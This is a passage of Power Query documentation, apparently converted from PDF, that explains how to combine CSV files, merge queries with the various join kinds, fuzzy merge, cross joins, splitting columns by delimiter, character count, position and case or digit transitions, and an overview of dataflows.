describes how the experience works when the files that you want to combine are CSV
files. More information: Combine files overview

 Tip

You can follow along with this example by downloading the sample files used in
this article from this download link . You can place those files in the data source
of your choice, such as a local folder, SharePoint folder, Azure Blob storage, Azure
Data Lake Storage, or other data source that provides the file system view.

For simplicity, the example in this article uses the Folder connector. More information:
Folder

About the sample files used


To combine files, it's imperative that they all have the same structure and the same
extension. All the files used in this example have the same structure and extension (.csv).

There are 12 CSV files, one for each month of the calendar year 2019. The following
image shows the first 15 rows of the file for the month of January.
The number of rows varies from file to file, but all files have a header section in the first
four rows. They have column headers in the fifth row, and the data for the table begins
in the sixth row and continues through all subsequent rows.

The goal is to combine all 12 files into a single table. This combined table contains the
header row at the top of the table, and includes the source name, date, country, units,
and revenue data for the entire year in separate columns after the header row.
Table preview
When connecting to the folder that hosts the files that you want to combine—in this
example, the name of that folder is CSV Files—you're shown the table preview dialog
box, which displays your folder path in the upper-left corner. The data preview shows
the file system view.

For this example, select Combine.

7 Note
In a different situation, you might select Transform data to further filter and
transform your data before combining the files. Selecting Combine is only
recommended when you're certain that the folder contains only the files that you
want to combine.

Combine files dialog box


After you select Combine in the table preview, the Combine files dialog box appears.

7 Note

Power Query automatically detects what connector to use based on the first file
found in the list. To learn more about the CSV connector, go to Text/CSV.

For this example, leave all the default settings (Example file set to First file, and the
default values for File origin, Delimiter, and Data type detection).

Now select Transform data in the lower-right corner to go to the output query.
Output query
After selecting Transform data in the Combine files dialog box, you'll be taken back to
the Power Query Editor in the query that you initially created from the connection to the
local folder. The output query now contains the source file name in the left-most
column, along with the data from each of the source files in the remaining columns.

However, the data isn't in the correct shape. You need to remove the top four rows from
each file before combining them. To make this change in each file before you combine
them, select the Transform Sample file query in the Queries pane on the left side of
your screen.

Modify the Transform Sample file query


In this Transform Sample file query, the values in the Date column indicate that the data
is for the month of April, which has the year-month-day (YYYY-MM-DD) format. April
2019.csv is the first file that's displayed in the table preview.
You now need to apply a new set of transformations to clean the data. Each
transformation will be automatically converted to a function inside the Helper queries
group that will be applied to every file in the folder before combining the data from
each file.

The transformations that need to be added to the Transform Sample file query are:

1. Remove top rows: To perform this operation, select the table icon menu in the
upper-left corner of the table, and then select Remove top rows.
In the Remove top rows dialog box, enter 4, and then select OK.

After selecting OK, your table will no longer have the top four rows.
2. Use first row as headers: Select the table icon again, and then select Use first row
as headers.

The result of that operation will promote the first row of the table to the new
column headers.
After this operation is completed, Power Query by default will try to automatically detect
the data types of the columns and add a new Changed column type step.

Revising the output query


When you go back to the CSV Files query, you'll notice that the last step is giving you an
error that reads "The column 'Column1' of the table wasn't found." The reason behind
this error is that the previous state of the query was doing an operation against a
column named Column1. But because of the changes made to the Transform Sample
file query, this column no longer exists. More information: Dealing with errors in Power
Query
You can remove this last step of the query from the Applied steps pane by selecting the
X delete icon on the left side of the name of the step. After deleting this step, your
query will show the correct results.

However, notice that none of the columns derived from the files (Date, Country, Units,
Revenue) have a specific data type assigned to them. Assign the correct data type to
each column by using the following table.

Column name Data type

Date Date

Country Text

Units Whole number

Revenue Currency

After defining the data types for each column, you'll be ready to load the table.
7 Note

To learn how to define or change column data types, go to Data types.

Verification
To validate that all files have been combined, you can select the filter icon on the
Source.Name column heading, which will display all the names of the files that have
been combined. If you get the warning "List may be incomplete," select Load more at
the bottom of the menu to display more available values in the column.
After you select Load more, all available file names will be displayed.
Merge queries overview
Article • 08/30/2023

A merge queries operation joins two existing tables together based on matching values
from one or multiple columns. You can choose to use different types of joins, depending
on the output you want.

Merging queries
You can find the Merge queries command on the Home tab, in the Combine group.
From the drop-down menu, you'll see two options:

Merge queries: Displays the Merge dialog box, with the selected query as the left
table of the merge operation.
Merge queries as new: Displays the Merge dialog box without any preselected
tables for the merge operation.

Identify tables for merging


The merge operation requires two tables:

Left table for merge: The first selection, from top to bottom of your screen.
Right table for merge: The second selection, from top to bottom of your screen.
7 Note

The position—left or right—of the tables becomes very important when you select
the correct join kind to use.

Select column pairs


After you've selected both the left and right tables, you can select the columns that
drive the join between the tables. In the example below, there are two tables:

Sales: The CountryID field is a key or an identifier from the Countries table.
Countries: This table contains the CountryID and the name of the country.
The goal is to join these tables by using the CountryID column from both tables, so you
select the CountryID column from each table. After you make the selections, a message
appears with an estimated number of matches at the bottom of the dialog box.

7 Note

Although this example shows the same column header for both tables, this isn't a
requirement for the merge operation. Column headers don't need to match
between tables. However, it's important to note that the columns must be of the
same data type, otherwise the merge operation might not yield correct results.

You can also select multiple columns to perform the join by selecting Ctrl as you select
the columns. When you do so, the order in which the columns were selected is
displayed in small numbers next to the column headings, starting with 1.

For this example, you have the Sales and Countries tables. Each of the tables has
CountryID and StateID columns, which you need to pair for the join between both
columns.

First select the CountryID column in the Sales table, select Ctrl, and then select the
StateID column. (This will show the small numbers in the column headings.) Next,
perform the same selections in the Countries table. The following image shows the
result of selecting those columns.

7 Note
When selecting multiple columns for a join, the order you select the columns in
each table must match. For example, the first column selected in the left table is
matched with the first column selected in the right table, and so on. Otherwise,
you'll observe incorrect join results.

Use the column pair suggestion


When selecting the left and right table in the Merge dialog, you can check the lightbulb
icon on the top right corner of the dialog to see if there are any suggestions when it
comes to column-pair-mapping between both tables.

There can be many suggestions in place but, for this scenario, there's only one
suggestion by the feature, where it maps the column CountryID from the Sales table to
the CountryID column from the Countries table. You can select it and the column-pair-
mapping will be automatically applied to your dialog.

7 Note
Only the column-pair-mapping is suggested. Other options in this dialog, such as
the join kind or fuzzy matching configuration, are out of scope for this suggestion.

Expand or aggregate the new merged table column


After selecting OK in the Merge dialog box, the base table of your query will have all the
columns from your left table. Also, a new column will be added with the same name as
your right table. This column holds the values corresponding to the right table on a row-
by-row basis.

From here, you can choose to expand or aggregate the fields from this new table
column, which will be the fields from your right table.

7 Note

Currently, the Power Query Online experience only provides the expand operation
in its interface. The option to aggregate will be added later this year.

Join kinds
A join kind specifies how a merge operation will be performed. The following table
describes the available join kinds in Power Query.
Join kind Icon Description

Left outer All rows from the left table, matching rows from the right table

Right outer All rows from the right table, matching rows from the left table

Full outer All rows from both tables

Inner Only matching rows from both tables

Left anti Only rows from the left table

Right anti Only rows from the right table

Fuzzy matching
You use fuzzy merge to apply fuzzy matching algorithms when comparing columns, to
try to find matches across the tables you're merging. You can enable this feature by
selecting the Use fuzzy matching to perform the merge check box in the Merge dialog
box. Expand Fuzzy matching options to view all available configurations.

7 Note
Fuzzy matching is only supported for merge operations over text columns.
Left outer join
Article • 12/17/2022

One of the join kinds available in the Merge dialog box in Power Query is a left outer
join, which keeps all the rows from the left table and brings in any matching rows from
the right table. More information: Merge operations overview

This article uses sample data to show how to do a merge operation with the left outer
join. The sample source tables for this example are:

Sales: This table includes the fields Date, CountryID, and Units. CountryID is a
whole number value that represents the unique identifier from the Countries table.

Countries: This table is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.

Field from the Sales table Field from the Countries table

CountryID id

The goal is to create a table like the following, where the name of the country appears
as a new Country column in the Sales table as long as the CountryID exists in the
Countries table. If there are no matches between the left and right tables, a null value is
the result of the merge for that row. In the following image, this is shown to be the case
for CountryID 4, which was brought in from the Sales table.

To do a left outer join

1. Select the Sales query, and then select Merge queries.


2. In the Merge dialog box, under Right table for merge, select Countries.
3. In the Sales table, select the CountryID column.
4. In the Countries table, select the id column.
5. In the Join kind section, select Left outer.
6. Select OK.
From the newly created Countries column, expand the Country field. Don't select the
Use original column name as prefix check box.
After performing this operation, you'll create a table that looks like the following image.
Right outer join
Article • 12/17/2022

One of the join kinds available in the Merge dialog box in Power Query is a right outer
join, which keeps all the rows from the right table and brings in any matching rows from
the left table. More information: Merge operations overview

This article uses sample data to show how to do a merge operation with the right outer
join. The sample source tables for this example are:

Sales: This table includes the fields Date, CountryID, and Units. The CountryID is a
whole number value that represents the unique identifier from the Countries table.

Countries: This table is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.

In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.
Field from the Sales table Field from the Countries table

CountryID id

The goal is to create a table like the following, where the name of the country appears
as a new Country column in the Sales table. Because of how the right outer join works,
all rows from the right table will be brought in, but only matching rows from the left
table will be kept.

To do a right outer join

1. Select the Sales query, and then select Merge queries.


2. In the Merge dialog box, under Right table for merge, select Countries.
3. In the Sales table, select the CountryID column.
4. In the Countries table, select the id column.
5. In the Join kind section, select Right outer.
6. Select OK.
From the newly created Countries column, expand the Country field. Don't select the
Use original column name as prefix check box.
After performing this operation, you'll create a table that looks like the following image.
Full outer join
Article • 12/17/2022

One of the join kinds available in the Merge dialog box in Power Query is a full outer
join, which brings in all the rows from both the left and right tables. More information:
Merge operations overview

This article uses sample data to show how to do a merge operation with the full outer
join. The sample source tables for this example are:

Sales: This table includes the fields Date, CountryID, and Units. CountryID is a
whole number value that represents the unique identifier from the Countries table.

Countries: This is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.

Field from the Sales table Field from the Countries table

CountryID id

The goal is to create a table like the following, where the name of the country appears
as a new Country column in the Sales table. Because of how the full outer join works, all
rows from both the left and right tables will be brought in, regardless of whether they
only appear in one of the tables.

To perform a full outer join

1. Select the Sales query, and then select Merge queries.


2. In the Merge dialog box, under Right table for merge, select Countries.
3. In the Sales table, select the CountryID column.
4. In the Countries table, select the id column.
5. In the Join kind section, select Full outer.
6. Select OK
7 Note

You can merge on more than one column by selecting and holding Ctrl and then
selecting the columns.

 Tip

Take a closer look at the message at the bottom of the dialog box that reads "The
selection matches 4 of 4 rows from the first table, and 3 of 4 rows from the second
table." This message is crucial for understanding the result that you get from this
operation.
In the Countries table, you have the Country Spain with id of 4, but there are no records
for CountryID 4 in the Sales table. That's why only three of four rows from the right
table found a match. All rows from the right table that didn't have matching rows from
the left table will be grouped and shown in a new row in the output table with no values
for the fields from the left table.

From the newly created Countries column after the merge operation, expand the
Country field. Don't select the Use original column name as prefix check box.

After performing this operation, you'll create a table that looks like the following image.
Inner join
Article • 12/17/2022

One of the join kinds available in the Merge dialog box in Power Query is an inner join,
which brings in only matching rows from both the left and right tables. More
information: Merge operations overview

This article uses sample data to show how to do a merge operation with the inner join.
The sample source tables for this example are:

Sales: This table includes the fields Date, CountryID, and Units. CountryID is a
whole number value that represents the unique identifier from the Countries table.

Countries: This is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.

Field from the Sales table Field from the Countries table

CountryID id

The goal is to create a table like the following, where the name of the country appears
as a new Country column in the Sales table. Because of how the inner join works, only
matching rows from both the left and right tables will be brought in.

To perform an inner join

1. Select the Sales query, and then select Merge queries.


2. In the Merge dialog box, under Right table for merge, select Countries.
3. In the Sales table, select the CountryID column.
4. In the Countries table, select the id column.
5. In the Join kind section, select Inner.
6. Select OK.
 Tip

Take a closer look at the message at the bottom of the dialog box that reads "The
selection matches 1 of 4 rows from the first table, and 1 of 2 rows from the second
table." This message is crucial to understanding the result that you get from this
operation.

In the Sales table, you have a CountryID of 1 and 2, but neither of these values are
found in the Countries table. That's why the match only found one of four rows in the
left (first) table.

In the Countries table, you have the Country Spain with the id 4, but there are no
records for a CountryID of 4 in the Sales table. That's why only one of two rows from
the right (second) table found a match.

From the newly created Countries column, expand the Country field. Don't select the
Use original column name as prefix check box.

After performing this operation, you'll create a table that looks like the following image.
Left anti join
Article • 12/17/2022

One of the join kinds available in the Merge dialog box in Power Query is a left anti join,
which brings in only rows from the left table that don't have any matching rows from
the right table. More information: Merge operations overview

This article uses sample data to show how to do a merge operation with the left anti
join. The sample source tables for this example are:

Sales: This table includes the fields Date, CountryID, and Units. CountryID is a
whole number value that represents the unique identifier from the Countries table.

Countries: This table is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.

Field from the Sales table Field from the Countries table

CountryID id

The goal is to create a table like the following, where only the rows from the left table
that don't match any from the right table are kept.

To do a left anti join

1. Select the Sales query, and then select Merge queries.


2. In the Merge dialog box, under Right table for merge, select Countries.
3. In the Sales table, select the CountryID column.
4. In the Countries table, select the id column.
5. In the Join kind section, select Left anti.
6. Select OK.
 Tip

Take a closer look at the message at the bottom of the dialog box that reads "The
selection excludes 1 of 4 rows from the first table." This message is crucial to
understanding the result that you get from this operation.

In the Sales table, you have a CountryID of 1 and 2, but neither of them are found in the
Countries table. That's why the match only found one of four rows in the left (first) table.

In the Countries table, you have the Country Spain with an id of 4, but there are no
records for CountryID 4 in the Sales table. That's why only one of two rows from the
right (second) table found a match.
From the newly created Countries column, expand the Country field. Don't select the
Use original column name as prefix check box.

After doing this operation, you'll create a table that looks like the following image. The
newly expanded Country field doesn't have any values. That's because the left anti join
doesn't bring any values from the right table—it only keeps rows from the left table.
Right anti join
Article • 12/17/2022

One of the join kinds available in the Merge dialog box in Power Query is a right anti
join, which brings in only rows from the right table that don't have any matching rows
from the left table. More information: Merge operations overview

This article uses sample data to show how to do a merge operation with the right anti
join. The sample source tables for this example are:

Sales: This table includes the fields Date, CountryID, and Units. CountryID is a
whole number value that represents the unique identifier from the Countries table.

Countries: This is a reference table with the fields id and Country. The id field
represents the unique identifier for each record.
In this example, you'll merge both tables, with the Sales table as the left table and the
Countries table as the right one. The join will be made between the following columns.

Field from the Sales table Field from the Countries table

CountryID id

The goal is to create a table like the following, where only the rows from the right table
that don't match any from the left table are kept. As a common use case, you can find
all the rows that are available in the right table but aren't found in the left table.

To do a right anti join

1. Select the Sales query, and then select Merge queries.


2. In the Merge dialog box, under Right table for merge, select Countries.
3. In the Sales table, select the CountryID column.
4. In the Countries table, select the id column.
5. In the Join kind section, select Right anti.
6. Select OK.
 Tip

Take a closer look at the message at the bottom of the dialog box that reads "The
selection excludes 1 of 2 rows from the second table." This message is crucial to
understanding the result that you get from this operation.

In the Countries table, you have the Country Spain with an id of 4, but there are no
records for CountryID 4 in the Sales table. That's why only one of two rows from the
right (second) table found a match. Because of how the right anti join works, you'll never
see any rows from the left (first) table in the output of this operation.

From the newly created Countries column, expand the Country field. Don't select the
Use original column name as prefix check box.
After performing this operation, you'll create a table that looks like the following image.
The newly expanded Country field doesn't have any values. That's because the right anti
join doesn't bring any values from the left table—it only keeps rows from the right table.
Fuzzy merge
Article • 12/17/2022

Fuzzy merge is a smart data preparation feature you can use to apply fuzzy matching
algorithms when comparing columns, to try to find matches across the tables that are
being merged.

You can enable fuzzy matching at the bottom of the Merge dialog box by selecting the
Use fuzzy matching to perform the merge option button. More information: Merge
operations overview

7 Note

Fuzzy matching is only supported on merge operations over text columns. Power
Query uses the Jaccard similarity algorithm to measure the similarity between pairs
of instances.

Sample scenario
A common use case for fuzzy matching is with freeform text fields, such as in a survey.
For this article, the sample table was taken directly from an online survey sent to a
group with only one question: What is your favorite fruit?

The results of that survey are shown in the following image.


The nine records reflect the survey submissions. The problem with the survey
submissions is that some have typos, some are plural, some are singular, some are
uppercase, and some are lowercase.

To help standardize these values, in this example you have a Fruits reference table.

7 Note
For simplicity, this Fruits reference table only includes the name of the fruits that
will be needed for this scenario. Your reference table can have as many rows as you
need.

The goal is to create a table like the following, where you've standardized all these
values so you can do more analysis.

Fuzzy merge operation


To do the fuzzy merge, you start by doing a merge. In this case, you'll use a left outer
join, where the left table is the one from the survey and the right table is the Fruits
reference table. At the bottom of the dialog box, select the Use fuzzy matching to
perform the merge check box.
After you select OK, you can see a new column in your table because of this merge
operation. If you expand it, you'll notice that there's one row that doesn't have any
values in it. That's exactly what the dialog box message in the previous image stated
when it said "The selection matches 8 of 9 rows from the first table."
Fuzzy matching options
You can modify the Fuzzy matching options to tweak how the approximate match
should be done. First, select the Merge queries command, and then in the Merge dialog
box, expand Fuzzy matching options.
The available options are:

Similarity threshold (optional): A value between 0.00 and 1.00 that provides the
ability to match records above a given similarity score. A threshold of 1.00 is the
same as specifying an exact match criteria. For example, Grapes matches with
Graes (missing the letter p) only if the threshold is set to less than 0.90. By default,
this value is set to 0.80.
Ignore case: Allows matching records no matter what the case of the text.
Match by combining text parts: Allows combining text parts to find matches. For
example, Micro soft is matched with Microsoft if this option is enabled.
Show similarity scores: Shows similarity scores between the input and the matches
values after fuzzy matching.
Number of matches (optional): Specifies the maximum number of matching rows
that can be returned for every input row.
Transformation table (optional): Allows matching records based on custom value
mappings. For example, Grapes is matched with Raisins if a transformation table is
provided where the From column contains Grapes and the To column contains
Raisins.

Transformation table
For the example in this article, you can use a transformation table to map the value that
has a missing pair. That value is apls, which needs to be mapped to Apple. Your
transformation table has two columns:

From contains the values to find.


To contains the values that will be used to replace the values found by using the
From column.

For this article, the transformation table will look as follows:

From To

apls Apple

You can go back to the Merge dialog box, and in Fuzzy matching options under
Number of matches, enter 1. Enable the Show similarity scores option, and then, under
Transformation table, select Transform Table from the drop-down menu.
After you select OK, you can go to the merge step. When you expand the column with
table values, you'll notice that besides the Fruit field you'll also see the Similarity score
field. Select both and expand them without adding a prefix.
After expanding these two fields, they'll be added to your table. Note the values you get
for the similarity scores of each value. These scores can help you with further
transformations if needed to determine if you should lower or raise your similarity
threshold.

For this example, the Similarity score serves only as additional information and isn't
needed in the output of this query, so you can remove it. Note how the example started
with nine distinct values, but after the fuzzy merge, there are only four distinct values.
Cross join
Article • 12/17/2022

A cross join is a type of join that returns the Cartesian product of rows from the tables in
the join. In other words, it combines each row from the first table with each row from
the second table.

This article demonstrates, with a practical example, how to do a cross join in Power
Query.

Sample input and output tables


For this example, the sample source tables are:

Product: A table with all the generic products that you sell.

Colors: A table with all the product variations, as colors, that you can have in your
inventory.

The goal is to perform a cross-join operation with these two tables to create a list of all
unique products that you can have in your inventory, as shown in the following table.
This operation is necessary because the Product table only contains the generic product
name, and doesn't give the level of detail you need to see what product variations (such
as color) there are.
Perform a cross join
To do a cross-join operation in Power Query, first go to the Product table. From the Add
column tab on the ribbon, select Custom column. More information: Add a custom
column

In the Custom column dialog box, enter whatever name you like in the New column
name box, and enter Colors in the Custom column formula box.
) Important

If your query name has spaces in it, such as Product Colors, the text that you need
to enter in the Custom column formula section has to follow the syntax #"Query
name" . For Product Colors, you need to enter #"Product Colors" .

You can check the name of your queries in the Query settings pane on the right
side of your screen or in the Queries pane on the left side.

After you select OK in the Custom column dialog box, a new column is added to the
table. In the new column heading, select Expand to expand the contents of this newly
created column, and then select OK.
After you select OK, you'll reach your goal of creating a table with all possible
combinations of Product and Colors.
Split columns by delimiter
Article • 12/17/2022

In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by a delimiter.

Where to find Split Columns > By Delimiter


You can find the Split Columns: By Delimiter option in three places:

Home tab—under the Split column dropdown menu inside the Transform group.

Transform tab—under the Split column dropdown menu inside the Text column
group.

Right-click a column—inside the Split column option.


Split columns by delimiter into columns
In this example, the initial table will be the one shown in the image below, with only one
column for Accounts.
This column holds two values:

Account number
Account name

In this example, you want to split this column into two columns. The values are
delimited by a space—the first space from left to right. To do this split, select the
column, and then select the option to split the column by a delimiter. In Split Column
by Delimiter, apply the following configuration:

Select or enter delimiter: Space


Split at: Left-most delimiter
The result of that operation will give you a table with the two columns that you're
expecting.

7 Note

Power Query will split the column into as many columns as needed. The name of
the new columns will contain the same name as the original column. A suffix that
includes a dot and a number that represents the split sections of the original
column will be appended to the name of the new columns.

Split columns by delimiter into rows


In this example, your initial table will be the one shown in the image below, with the
columns Cost Center and Accounts.

The Accounts column has values in pairs separated by a comma. These pairs are
separated by a semicolon. The goal of this example is to split this column into new rows
by using the semicolon as the delimiter.

To do that split, select the Accounts column. Select the option to split the column by a
delimiter. In Split Column by Delimiter, apply the following configuration:

Select or enter delimiter: Semicolon


Split at: Each occurrence of the delimiter
Split into: Rows
The result of that operation will give you a table with the same number of columns, but
many more rows because the values inside the cells are now in their own cells.

Final Split
Your table still requires one last split column operation. You need to split the Accounts
column by the first comma that it finds. This split will create a column for the account
name and another one for the account number.

To do that split, select the Accounts column and then select Split Column > By
Delimiter. Inside the Split column window, apply the following configuration:

Select or enter delimiter: Comma


Split at: Each occurrence of the delimiter

The result of that operation will give you a table with the three columns that you're
expecting. You then rename the columns as follows:

Previous Name New Name


Previous Name New Name

Accounts.1 Account Name

Accounts.2 Account Number

Your final table looks like the one in the following image.
Split columns by number of characters
Article • 12/17/2022

In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by the number of characters.

Where to find Split Columns > By Number of


Characters
You can find the Split Columns > By Number of Characters option in three places:

Home tab—under the Split Column dropdown menu inside the Transform group.

Transform tab—under the Split Column dropdown menu inside the Text Column
group.

Right-click a column—inside the Split Column option.


Split columns by number of characters into
columns
The initial table for this example will be the one below, with only one column for
Column1.

This column holds three values:

Account Name—in the first six characters


Date—in the following eight characters with the format yyyymmdd
Units—the remaining characters

In this example, you want to split this column into three columns containing the values
described in the list above.
To do this split, select the column and then select the option to split the column by the
number of characters. In Split column by Number of Characters, apply the following
configuration:

Number of characters: 6
Split: Once, as far left as possible

The result of that operation will give you a table with two columns. One for the account
name and the other one that contains the combined values for the date and units.

7 Note

Power Query will split the column into only two columns. The name of the new
columns will contain the same name as the original column. A suffix containing a
dot and a number that represents the split section of the column will be appended
to the names of the new columns.

Now continue to do the same operation over the new Column1.2 column, but with the
following configuration:

Number of characters: 8
Split: Once, as far left as possible
The result of that operation will yield a table with three columns. Notice the new names
of the two columns on the far right. Column1.2.1 and Column1.2.2 were automatically
created by the split column operation.

You can now change the name of the columns and also define the data types of each
column as follows:

Original Column Name New Column name Data type

Column1.1 Account Name Text

Column1.2.1 Date Date

Column1.2.2 Units Whole Number

Your final table will look like the one in the following image.
Split columns by number of characters into
rows
The initial table for this example will be the one below, with the columns Group and
Account.

The Account column can hold multiple values in the same cell. Each value has the same
length in characters, with a total of six characters. In this example, you want to split
these values so you can have each account value in its own row.

To do that, select the Account column and then select the option to split the column by
the number of characters. In Split column by Number of Characters, apply the following
configuration:

Number of characters: 6
Split: Repeatedly
Split into: Rows

The result of that operation will give you a table with the same number of columns, but
many more rows because the fragments inside the original cell values in the Account
column are now split into multiple rows.
Split columns by positions
Article • 12/17/2022

In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by positions.

Where to find Split Columns > By Positions


You can find the Split Columns > By Positions option in three places:

Home tab—under the Split Column dropdown menu inside the Transform group.

Transform tab—under the Split Column dropdown menu inside the Text Column
group.

Right-click a column—inside the Split Column option.


Split columns by positions into columns
The initial table for this example will be the one shown in the image below, with only
one column for Column1.

This column holds three values:

Account Name—in the first six characters


Date—in the next eight characters with the format yyyymmdd
Units—the rest of the characters

In this example, you want to split this column into the three columns made from the
values in the list above. To do this split, select the column and then select the option to
split the column by positions. In Split Column by Positions, apply the following
configuration:
Positions: 0,6,14
Positions are zero-based and comma-separated, where position zero is the start
of the string.

7 Note

This operation will first start creating a column from position 0 to position 6, then
from position 7 to position 14. There will be another column should there be values
with a length of 16 or more characters in the current data preview contents.

The result of that operation will give you a table with three columns.

7 Note

Power Query will split the column into only two columns. The name of the new
columns will contain the same name as the original column. A suffix created by a
dot and a number that represents the split section of the column will be appended
to the name of the new columns.

You can now change the name of the columns, and also define the data types of each
column as follows:

Original Column Name New Column name Data type

Column1.1 Account Name Text


Original Column Name New Column name Data type

Column1.2 Date Date

Column1.3 Units Whole Number

Your final table will look the one in the following image.

Split columns by positions into rows


The initial table for this example will be like the one in the image below, with the
columns Group and Account.

The Account column can only hold two values in the same cell. Each value has the same
length in characters, with a total of six characters. In this example, you want to split
these values so you can have each account value in its own row. To do that, select the
Account column and then select the option to split the column by positions. In Split
Column by Positions, apply the following configuration:

Positions: 0, 6
Split into: Rows
7 Note

This operation will first start creating a column from position 0 to position 6. There
will be another column should there be values with a length of 8 or more
characters in the current data preview contents.

The result of that operation will give you a table with the same number of columns, but
many more rows because the values inside the cells are now in their own cells.
Split columns by lowercase to uppercase
Article • 02/17/2023

In Power Query, you can split a column through different methods. If your data contains
CamelCased text or a similar pattern, then the column(s) selected can be split by every
instance of the last lowercase letter to the next uppercase letter easily.

Where to find Split Columns > By Lowercase to


Uppercase
You can find the Split Columns: By Lowercase to Uppercase option in three places:

Home tab—under the Split Column dropdown menu inside the Transform group.

Transform tab—under the Split Column dropdown menu inside the Text Column
group.

Right-click a column—inside the Split Column option.


Split columns by lowercase to uppercase into
columns
The initial table in this example will be the one shown in the image below, with one
column for Word and an extra column named Syllables. You'll only focus on the first
column.

This column holds two values in each row:

FirstWord—The first half of the compound word.


SecondWord—The second half of the compound word.
In this example, you want to split this column into the two columns described in the list
above. Select the column and then select the option to split the column by lowercase to
uppercase.

This single column will split into multiple columns, given every instance of the last
lowercase letter to the next uppercase letter. In this case, it only splits into two columns.

Your final table will look like the following image.


Split columns by uppercase to lowercase
Article • 02/17/2023

In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by every instance of the last uppercase letter to the next
lowercase letter.

Where to find Split Columns > By Uppercase to


Lowercase
You can find the Split Columns > By Uppercase to Lowercase option in three places:

Home tab—under the Split Column dropdown menu inside the Transform group.

Transform tab—under the Split Column dropdown menu inside the Text Column
group.

Right-click a column—inside the Split Column option.


Split columns by uppercase to lowercase into
columns
Your initial table in this example will be the one shown in the image below, with only
one column for Column1.

This column holds two values:

FirstWord—The first half of a product that is in camel case.


SecondWord—The second half of a product that is in camel case.
In this example, you want to split this column into the two columns described in the list
above. Select the column and then select the option to split the column by uppercase to
lowercase.

This single column will split into multiple columns, given every instance of the last
uppercase letter to the next lowercase letter. In this case, it only splits into two columns.

Your final table will look like the following image.


Split columns by digit to non-digit
Article • 02/17/2023

In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by every instance of a digit followed by a non-digit.

Where to find Split columns > By Digit to Non-


Digit
You can find the Split Columns: By Digit to Non-Digit option in three places:

Home tab—under the Split Column dropdown menu inside the Transform group.

Transform tab—under the Split Column dropdown menu inside the Text Column
group.

Right-click a column—inside the Split Column option.


Split columns by digit to non-digit into
columns
The initial table in this example will be the one shown in the image below, with a column
for Pets and other extra columns. This example will only focus on the Pets column.

This column holds two values in each row:

Rank—The rank of the animal.


AnimalType—The second part of the word is the type of animal.
In this example, you want to split this column into the two columns described in the list
above. Select the column and then select the option to split the column by digit to non-
digit.

This single column will split into multiple columns, given every instance of a digit
followed with a non-digit. In this case, it only splits it into two.

Your final table will look like the following image.


Split columns by non-digit to digit
Article • 02/17/2023

In Power Query, you can split a column through different methods. In this case, the
column(s) selected can be split by every instance of a non-digit followed by a digit.

Where to find Split Columns > By Non-Digit to


Digit
You can find the Split Columns > By Non-Digit to Digit option in three places:

Home tab—under the Split Column dropdown menu inside the Transform group.

Transform tab—under the Split Column dropdown menu inside the Text Column
group.

Right-click a column—inside the Split Column option.


Split columns by non-digit to digit into
columns
The initial table in this example will be the one shown in the image below, with a column
for Pets and other extra columns. In this example, you'll only focus on the Pets column.

This column holds two values in each row:

AnimalType—The first part is the type of animal.


Number—The animal number that came into the person's life.

In this example, you want to split this column into the two columns described in the list
above. Select the column and then select the option to split the column by non-digit to
digit.

This single column will split into multiple columns, given every instance of a digit
followed by a non-digit. In this case, it only splits into two columns.

Your final table will look like the following image.


What are dataflows?
Article • 07/27/2023

 Tip

Try out Dataflow Gen2 in Data Factory in Microsoft Fabric, an all-in-one analytics
solution for enterprises. Microsoft Fabric covers everything from data movement to
data science, real-time analytics, business intelligence, and reporting. Learn how to
start a new trial for free!

Dataflows are a self-service, cloud-based, data preparation technology. Dataflows


enable customers to ingest, transform, and load data into Microsoft Dataverse
environments, Power BI workspaces, or your organization's Azure Data Lake Storage
account. Dataflows are authored by using Power Query, a unified data connectivity and
preparation experience already featured in many Microsoft products, including Excel
and Power BI. Customers can trigger dataflows to run either on demand or automatically
on a schedule; data is always kept up to date.

Dataflows can be created in multiple Microsoft


products
Dataflows are featured in multiple Microsoft products and don't require a dataflow-
specific license to be created or run. Dataflows are available in Power Apps, Power BI,
and Dynamics 365 Customer Insights. The ability to create and run dataflows is bundled
with those products' licenses. Dataflow features are mostly common across all products
they're featured in, but some product-specific features might exist in dataflows created
in one product versus another.

How does the dataflow function?


The previous image shows an overall view of how a dataflow is defined. A dataflow gets
data from different data sources (more than 80 data sources are supported already).
Then, based on the transformations configured with the Power Query authoring
experience, the dataflow transforms the data by using the dataflow engine. Finally, the
data is loaded to the output destination, which can be a Microsoft Power Platform
environment, a Power BI workspace, or the organization's Azure Data Lake Storage
account.

Dataflows run in the cloud


Dataflows are cloud-based. When a dataflow is authored and saved, its definition is
stored in the cloud. A dataflow also runs in the cloud. However, if a data source is on-
premises, an on-premises data gateway can be used to extract the data to the cloud.
When a dataflow run is triggered, the data transformation and computation happens in
the cloud, and the destination is always in the cloud.
Dataflows use a powerful transformation engine
Power Query is the data transformation engine used in the dataflow. This engine is
capable enough to support many advanced transformations. It also uses a
straightforward, yet powerful, graphical user interface called Power Query Editor. You
can use dataflows with this editor to develop your data integration solutions faster and
more easily.

Dataflow integration with Microsoft Power Platform and


Dynamics 365
Because a dataflow stores the resulting entities in cloud-based storage, other services
can interact with the data produced by dataflows.
For example, Power BI, Power Apps, Power Automate, Power Virtual Agents, and
Dynamics 365 applications can get the data produced by the dataflow by connecting to
Dataverse, a Power Platform dataflow connector, or directly through the lake, depending
on the destination configured at dataflow creation time.

Benefits of dataflows
The following list highlights some of the benefits of using dataflows:

A dataflow decouples the data transformation layer from the modeling and
visualization layer in a Power BI solution.

The data transformation code can reside in a central location, a dataflow, rather
than be spread out among multiple artifacts.

A dataflow creator only needs Power Query skills. In an environment with multiple
creators, the dataflow creator can be part of a team that together builds the entire
BI solution or operational application.

